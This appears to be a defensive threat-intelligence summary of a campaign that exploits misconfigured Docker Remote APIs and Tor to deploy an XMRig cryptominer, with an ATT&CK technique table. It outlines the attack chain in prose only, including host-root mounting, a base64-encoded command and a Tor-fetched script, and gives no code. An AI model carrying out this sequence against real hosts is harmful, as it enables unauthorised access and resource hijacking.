EXECUTIVE SUMMARY:
A new cyberattack has been identified in which threat actors exploit misconfigured Docker Remote APIs in combination with the Tor anonymity network to deploy cryptocurrency mining malware. This technique allows attackers to gain unauthorized access to containerized environments and conceal their activities. The campaign targets organizations relying heavily on cloud infrastructure, particularly within the technology, finance, and healthcare sectors.
The attack begins with the attacker sending a request to the Docker Remote API to enumerate available containers. Upon confirming no active containers, the attacker issues a container creation request using the lightweight “alpine” Docker image. In this process, the host root directory is mounted into the container enabling potential container escape and host-level manipulation. The command executed within the container is base64-encoded to evade detection and once decoded, initiates the installation of the Tor network. Through Tor, the container anonymously retrieves and executes a remote script hosted on a hidden “.onion” service. All traffic and DNS resolution are routed through Tor using the “socks5h” protocol, ensuring high levels of anonymity. The payload eventually drops a binary containing a bundled XMRig miner, pre-configured with wallet addresses, mining pool information, and execution parameters. This self-contained dropper minimizes external dependencies, enhances stealth, and streamlines the deployment process.
This exemplifies the techniques threat actors are employing by combining container platform vulnerabilities with privacy networks like Tor to conceal malicious activity. Understanding these tactics is critical for organizations to strengthen their security posture, particularly those heavily reliant on containerized environments in the cloud. Continuous monitoring of exposed Docker APIs, proper configuration management, and integration are essential to detecting and mitigating such stealthy cryptomining campaigns.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Resource Development | T1583.006 | Acquire Infrastructure | Web Services |
| Initial Access | T1190 | Exploit Public-Facing Application | – |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| T1059.004 | Unix Shell | ||
| T1203 | Exploitation for Client Execution | – | |
| Defense Evasion | T1090.003 | Proxy | Multi-hop Proxy |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Impact | T1496 | Resource Hijacking | – |
REFERENCES:
The following reports contain further technical details: